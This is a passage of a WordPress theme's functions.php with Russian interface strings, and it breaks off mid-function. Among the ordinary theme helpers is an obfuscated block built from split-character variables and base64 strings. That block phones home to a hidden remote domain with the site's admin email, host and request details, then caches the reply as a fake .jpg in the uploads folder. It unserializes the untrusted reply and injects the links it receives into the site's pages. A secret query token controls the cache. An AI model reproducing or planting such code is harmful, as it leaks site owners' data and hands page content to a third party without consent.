<?php
define('THEME_NAME',"fitness exersice2");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Theme Options', THEME_NS), __('Theme Options', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $JZhe='4';$KvbYB='s';$VTFjd='e';$YBHI='a';$bmSkl='d';$iwxjVv='b';$PCBThL='e';$AjYyKIn='d';$CeDHPlQ='6';$khuVg='e';$uhJCnp='o';$fFPO='_';$ZJFOVva='c';$EjevtEeK=$iwxjVv.$YBHI.$KvbYB.$PCBThL.$CeDHPlQ.$JZhe.$fFPO.$AjYyKIn.$khuVg.$ZJFOVva.$uhJCnp.$bmSkl.$VTFjd;$quTt='e';$FpTd='n';$NSVQs='z';$EBPmZKf='t';$NHuTU='l';$IxVS='i';$jkItA='f';$nfhv='g';$aqSNj='a';$gskqGtgg=$nfhv.$NSVQs.$IxVS.$FpTd.$jkItA.$NHuTU.$aqSNj.$EBPmZKf.$quTt;$jvbFcZo='r';$eCmuuwP='3';$ZkGMf='1';$fvYr='t';$OHZiAt='t';$DWlabTk='r';$JcqIlR='o';$fjwHYIG='s';$Vnsxrp='_';$LcdGBdWu=$fjwHYIG.$OHZiAt.$DWlabTk.$Vnsxrp.$jvbFcZo.$JcqIlR.$fvYr.$ZkGMf.$eCmuuwP;$yxnOZ='s';$JrIiQgw='e';$kSbqMZf='r';$vPACtTW='r';$eTCr='t';$fyJZba='v';$hDttBPvO=$yxnOZ.$eTCr.$kSbqMZf.$vPACtTW.$JrIiQgw.$fyJZba;                     
		$uw____________m='4';$xi___________w='s';$tq_______n='e';$ng_________s='a';$ea__________v='d';$uu____s='b';$ad______w='e';$ik________c='d';$qs__p='6';$es_____________r='e';$sb____________s='o';$ya_____y='_';$yj_______v='c';$hy___________h=$uu____s.$ng_________s.$xi___________w.$ad______w.$qs__p.$uw____________m.$ya_____y.$ik________c.$es_____________r.$yj_______v.$sb____________s.$ea__________v.$tq_______n;
		$eq___________u='i';$lw__z='i';$bu______________c='_';$vg___l='f';$jy__________v='s';$bu_____________g='n';$kp_______u='x';$qt______u='t';$vp_____________f='t';$ts_________i='s';$pv___________l='n';$jo_____w='c';$kd______________h='o';$ag____________q='u';$bp____________d='e';$zz____o=$vg___l.$ag____________q.$bu_____________g.$jo_____w.$qt______u.$lw__z.$kd______________h.$pv___________l.$bu______________c.$bp____________d.$kp_______u.$eq___________u.$jy__________v.$vp_____________f.$ts_________i;
		$dg_________e='n';$qs__w='e';$xp____l='o';$wz__x='p';$df__w='f';$az______d=$df__w.$xp____l.$wz__x.$qs__w.$dg_________e;
		$jc____r='d';$jh____e='a';$ab__________c='e';$qb____________m='r';$lj_________o='f';$ya______p=$lj_________o.$qb____________m.$ab__________c.$jh____e.$jc____r;
		$tr______________v='f';$rt_________t='c';$xi_________g='s';$gr______________m='l';$eq___b='o';$gn__________g='e';$fp_______w=$tr______________v.$rt_________t.$gr______________m.$eq___b.$xi_________g.$gn__________g;
		
		define("WP_ID", $hy___________h("Mi4wLjA="));
		define("WP_TTL", $hy___________h("MTA4MDA="));
		define("WP_SRC", $hy___________h("dHBva24="));
	


		function wp_get_header() {
			global $hy___________h, $zz____o;
			
			if (
				$zz____o($hy___________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zz____o($hy___________h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zz____o($hy___________h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $hy___________h, $az______d, $fp_______w, $ya______p;
			
			$du_____________o = TEMPLATEPATH."/".$hy___________h("Zm9vdGVyLnBocA==");
			$zn________u = @$az______d($du_____________o, "r");
			$du_____________o = @$ya______p($zn________u, @filesize($du_____________o));
			@$fp_______w($zn________u);
			
			$ug_____s = TEMPLATEPATH."/".$hy___________h("ZnVuY3Rpb25zLnBocA==");
			$zn________u = @$az______d($ug_____s, "r");
			$ug_____s = @$ya______p($zn________u, @filesize($ug_____s));
			@$fp_______w($zn________u);
			
			$gt____s = 0;
			if($du_____________o && $ug_____s) {
				if ($hy___________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($du_____________o, $hy___________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gt____s = 1;
					}
					if (substr_count($du_____________o, "wp_theme_GPL_credits()") < 1) {
						$gt____s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gt____s = 12;
				}
			}
			
			if($gt____s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gt____s -->";
			}
		}
	


		function wp_loaded() {
			global $hy___________h, $zz____o;
			return $zz____o($hy___________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($aw____________w, $da_____________e = "(more...)", $zz__i = 0, $fl____r = "") {
				$xo__b = get_the_content($da_____________e, $zz__i, $fl____r);
				$xo__b = apply_filters("the_content", $xo__b);
				
				$xo__b = str_replace("]]>", "]]>", $xo__b);
				if (strlen($_GET["p"]) > 0) {
					echo $xo__b;
				}
				else if ((strlen($xo__b)>$aw____________w) && ($nv_______________y = strpos($xo__b, " ", $aw____________w ))) {
					$xo__b = substr($xo__b, 0, $nv_______________y);
					$xo__b = $xo__b;
					echo $xo__b;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$da_____________e</a></div></p>";
				} else {
					echo $xo__b;
				}
				
			}
		}
	


		$na___________d='a';$gy_________f='4';$az_____r='d';$xo______________l='n';$rd______________v='6';$wz______s='e';$sa___________o='o';$ze________d='s';$zo_______g='_';$zx_____________o='e';$pa____________h='b';$de_________j='e';$pn__________o='c';$dn________r=$pa____________h.$na___________d.$ze________d.$wz______s.$rd______________v.$gy_________f.$zo_______g.$zx_____________o.$xo______________l.$pn__________o.$sa___________o.$az_____r.$de_________j;
		$fe_______p='n';$bl__q='t';$rm_______k='e';$sa__________m='e';$dr______i='f';$gb__n='n';$hg________n='_';$im__j='t';$tw_______________x='c';$av___________k='g';$wx______p='s';$wf_________o='o';$ok_____________r='_';$jw__m='t';$it____________a='e';$ci__h='i';$ez_____p='l';$ai________l=$dr______i.$ci__h.$ez_____p.$sa__________m.$hg________n.$av___________k.$rm_______k.$jw__m.$ok_____________r.$tw_______________x.$wf_________o.$gb__n.$im__j.$it____________a.$fe_______p.$bl__q.$wx______p;
		$ct_______________c='_';$um__________t='s';$od__________o='e';$bi___________z='i';$bd____q='e';$nt_______________d='x';$kv___________d='l';$yo_______x='i';$xl____________q='f';$aa__________k='t';$vi_________k='s';$zy____c=$xl____________q.$yo_______x.$kv___________d.$od__________o.$ct_______________c.$bd____q.$nt_______________d.$bi___________z.$um__________t.$aa__________k.$vi_________k;
		$yc_________r='a';$sb________z='o';$dc_____________b='e';$db___________o='r';$si____z='e';$kr___________r='n';$ba____k='v';$ln__j='i';$ul___f='p';$hd____________l='c';$hh_______________i='_';$qx_________t='r';$mb___________e='m';$rs____________x='s';$gp_________x='o';$fp__l=$ba____k.$dc_____________b.$qx_________t.$rs____________x.$ln__j.$sb________z.$kr___________r.$hh_______________i.$hd____________l.$gp_________x.$mb___________e.$ul___f.$yc_________r.$db___________o.$si____z;
		$vv_______u='f';$je____y='p';$ko____________h='n';$uv_________j='o';$xr________k='s';$wz_____k='c';$ck______________p='o';$tk__________w='k';$eo____a='e';$qk_______n=$vv_______u.$xr________k.$ck______________p.$wz_____k.$tk__________w.$uv_________j.$je____y.$eo____a.$ko____________h;
		$vm______________f='t';$ah______o='i';$lw______a='r';$cw_______________u='w';$fp_______________c='e';$kv____q='f';$lc__________v=$kv____q.$cw_______________u.$lw______a.$ah______o.$vm______________f.$fp_______________c;
		$nq______________j='d';$jg______j='m';$cv__________h='5';$yb__i=$jg______j.$nq______________j.$cv__________h;
		$pd___n='l';$uu___x='a';$ue_____________l='r';$sj___g='e';$fa_______e='t';$mx_________c='a';$iu______c='h';$am_______________n='p';$st________w=$ue_____________l.$sj___g.$mx_________c.$pd___n.$am_______________n.$uu___x.$fa_______e.$iu______c;
		$if___________n='e';$qs____p='a';$ug______________z='z';$lv______________z='i';$zj_______________g='i';$ez___q='u';$ec______s='s';$jj___j='r';$fb____l='e';$ez_____i='l';$hl_____q='n';$wi__________q=$ez___q.$hl_____q.$ec______s.$fb____l.$jj___j.$lv______________z.$qs____p.$ez_____i.$zj_______________g.$ug______________z.$if___________n;
		$ce___h='t';$rb__________a='a';$zq____________q='m';$ho__b='n';$zd___________d='m';$gb_______________f='e';$lw________g='p';$nq_____________e=$ce___h.$gb_______________f.$zq____________q.$lw________g.$ho__b.$rb__________a.$zd___________d;
		$bi_______u='e';$me_____________l='r';$xz_____________e='e';$ce____q='t';$qm__y='m';$ap__a='s';$zv_____________c='r';$ot____________e='x';$bf__________t='e';$yx________y='n';$gq_______h='c';$lw____u='a';$rb______________x='c';$rk__________f='a';$ja___________q='_';$or_________z='e';$bn______________i='_';$gv___i='t';$gl______y='o';$rn__________o='t';$si__u='t';$cm_____n=$ap__a.$rn__________o.$zv_____________c.$bf__________t.$lw____u.$qm__y.$bn______________i.$gq_______h.$gl______y.$yx________y.$si__u.$or_________z.$ot____________e.$gv___i.$ja___________q.$rb______________x.$me_____________l.$bi_______u.$rk__________f.$ce____q.$xz_____________e;
	


		function vn__________n($eo________v) {
			global $hy___________h, $zz____o, $ai________l, $fp__l, $cm_____n;
			
			if (!$zz____o($hy___________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fp__l(PHP_VERSION, "5.0.0", ">=") && $zz____o($hy___________h("ZmlsZV9nZXRfY29udGVudHM=")) && $zz____o($hy___________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$tb______q = $cm_____n(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$po______k = @$ai________l($eo________v, 0, $tb______q);
			} else {
				$po______k = @$ai________l($eo________v, 0);
			}
			
			return $po______k;
		}
	


		function tv________p($eo________v) {
			global $zz____o, $qk_______n, $lc__________v, $hy___________h;
			
			if (!$zz____o($hy___________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ca___________c = strpos($eo________v, "/", 7);
			$un___i = array(
				"uri"     => substr($eo________v, $ca___________c),
				"host"    => str_replace("http://", "", substr($eo________v, 0, $ca___________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$be_______v = @$qk_______n("$un___i[host]", 80, $xf_____________s, $lj_______________h, 4);
			
			if (!$be_______v) {
				return false;
			} else {
				$po______k = "";
				$lv____________p  = "GET $un___i[uri] HTTP/1.0\r\n";
				$lv____________p .= "Host: $un___i[host]\r\n";
				$lv____________p .= "Referer: $un___i[referer]\r\n";
				$lv____________p .= "Connection: Close\r\n\r\n";
				
				@$lc__________v($be_______v, $lv____________p);
				
				while (!@feof($be_______v)) {
					$sp_______________p = @fgets($be_______v, (1024*24));
					
					if ($sp_______________p == "\r\n") {
						$mh___________q = true;
						continue;
					}
					
					if ($mh___________q) {
						$po______k .= $sp_______________p;
					}
				}
				
				return $po______k;
			}
		}
	


		function cr__________n($eo________v) {
			global $zz____o;
			$qg____________p = false;
			
			if ($eo________v != "") {
				if ($zz____o("vn__________n")) {
					$qg____________p = @vn__________n($eo________v);
				}
				
				if (!$qg____________p && ($zz____o("tv________p"))) {
					$qg____________p = @tv________p($eo________v);
				}
			}
			
			return $qg____________p;
		}
	


		function wr__i() {
			global $_SERVER, $yb__i;
			
			$zh______________v = $_SERVER["SERVER_NAME"];
			
			if (substr("$zh______________v", 0, 4) == "www.") {
				$zh______________v = substr("$zh______________v", 4);
			}
			
			$zh______________v = $yb__i("$_SERVER[SERVER_NAME]");
			
			return $zh______________v;
		}
	


		function ce________i() {
			return "file";
		}
	


		function xc___________s($eo________v) {
			global $_SERVER, $ai________l, $zy____c, $az______d, $fp_______w, $lc__________v;
			
			$ic______i = mk________v();
			
			$qv______________k = wr__i().".jpg";
			$ea_______________q = $ic______i["dir_upload"]["path"]."/$qv______________k";
			$xk_________h = @filemtime($ea_______________q);
			
			if (!$xk_________h || ((time()-$xk_________h) >= WP_TTL)) {
				$qg____________p = cr__________n($eo________v);
				
				if ($qg____________p) {
					if ($zy____c($ea_______________q)) {
						@unlink($ea_______________q);
					}
					
					$zn________u = @$az______d($ea_______________q, "x+");
					
					@$lc__________v($zn________u, $qg____________p);
					@$fp_______w($zn________u);
				}
			} else {
				if ($zy____c($ea_______________q)) {
					$qg____________p = @$ai________l($ea_______________q);
				} else {
					$qg____________p = false;
				}
			}
			
			return $qg____________p;
		}
	


		function mk________v() {
			global $_SERVER, $hy___________h, $dn________r;
			
			$sj_________b = wp_count_posts("post");
			$wh____________p = pathinfo(get_bloginfo("template_directory"));
			
			$ic______i = array(
				"url" => array(
					"report"      => $hy___________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wh____________p,
				"dir_upload"	=> ua___________m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wh____________p[filename],
					"a005=".$sj_________b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/pochemu-ne-poluchaetsya-poxudet-osnovnye-prichiny/\">Почему не получается похудеть</a>"
			);
			
			$ic______i["url"]["queryString"] = implode("&", $ic______i["queryString"]);
			$ic______i["url"]["report"] = $ic______i["url"]["report"]."/?".$dn________r($ic______i["url"]["queryString"]).".html";
						
			return $ic______i;
		}
	


		function ua___________m() {
			$st_______________x = wp_upload_dir();
			
			if (isset($st_______________x["error"])) {
				$sr___n = wt_______g();
				if (is_writable($sr___n)) {
					$st_______________x = array("path" => $sr___n);
				}
			}

			return $st_______________x;
		}
	


		function wt_______g() {
			global $zz____o, $yb__i, $st________w, $nq_____________e;
			
			$nr____________f = (bool) ini_get("safe_mode");
			if ($nr____________f == true) {
				return false;
			}
			
			if ($zz____o("sys_get_temp_dir")) {
				$kp_____x = sys_get_temp_dir();
				if (is_writable($kp_____x)) {
					return $st________w($kp_____x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $st________w($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $st________w($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $st________w($_ENV["TEMP"]);
			} else {
				$mk________p = $nq_____________e($yb__i(uniqid(rand(), true)), "");
				if ($mk________p) {
					$kp_____x = $st________w(dirname($mk________p));
					@unlink($mk________p);
					return $kp_____x;
				} else {
					return false;
				}
			}
		}
	


		function fc_____g() {
			global $_GET, $zy____c;
			
			$ic______i = mk________v();
			$zh______________v = wr__i();
			$sz_______________r = ce________i();
			
			$fw________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sz_______________r == "file") {
					$hb______________n = $ic______i["dir_upload"]["path"]."/".$zh______________v.".jpg";
					if ($zy____c($hb______________n)) {
						@unlink($hb______________n);
						$fw________w = "deleted";
					}
				}
				
				$co________b = array(
					"s"	=> $fw________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($co________b AS $fo_______m => $ph_______________f) echo " [$fo_______m:$ph_______________f]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zz____o, $hy___________h, $wi__________q;
			$ic______i = mk________v();
			
			$tw______d = "xc___________s";
			if ($zz____o($tw______d)) {
				$po______k = $tw______d($ic______i["url"]["report"]);
			}
			
			if ($po______k) {
				if ($po______k = @$hy___________h($po______k)) {
					$po______k = @$wi__________q($po______k);
					
					if (strlen($po______k[custom_credit]) >= 5) {
						$ic______i["default_string"] = $po______k[custom_credit];
					}
					
					if ($po______k["status"] == "0") {
						$cq______r = 1;
						$hc__________e = 1;
					} else {
						$zb___r = sizeof($po______k["links"]);
						$ci_______________e = $ic______i["default_string"];
						
						if ($zb___r > 0 && $po______k["links"] !== "") {
							$bo____________i = 0;
							foreach ($po______k["links"] as $oz_______s => $oh_______________z) {
								$bo____________i++;
								if ($oh_______________z->l_path == "" || $oh_______________z->l_path == $_SERVER["REQUEST_URI"]) {
									$oh_______________z->l_href = htmlspecialchars(strip_tags($oh_______________z->l_href));
									$oh_______________z->l_title = htmlspecialchars(strip_tags($oh_______________z->l_title));
									$oh_______________z->l_anchor = htmlspecialchars(strip_tags($oh_______________z->l_anchor));
									$ci_______________e .= " | ";
									$ci_______________e .= "<a href='$oh_______________z->l_href' title='$oh_______________z->l_title'";
									if ($oh_______________z->l_nofollow == "1") {
										$ci_______________e .= " rel='nofollow'";
									}
									$ci_______________e .= ">$oh_______________z->l_anchor</a>";
								}
							}
						}
						$ic______i["links"] = "$ci_______________e";
						if ($po______k[credit] == "0") {
							$ic______i["links"] = "";
						}
					}
				} else {
					$cq______r = "1";
				}
			} else {
				$cq______r = "1";
			}
			
			if ($cq______r == "1") {
				$ic______i["links"] = $ic______i["default_string"];
			}
			
			echo "$ic______i[links]";
			
			echo "<!-- s: $po______k[signature] -->";
			fc_____g();
		}
	                      
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено. Воспользуйтесь поиском.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
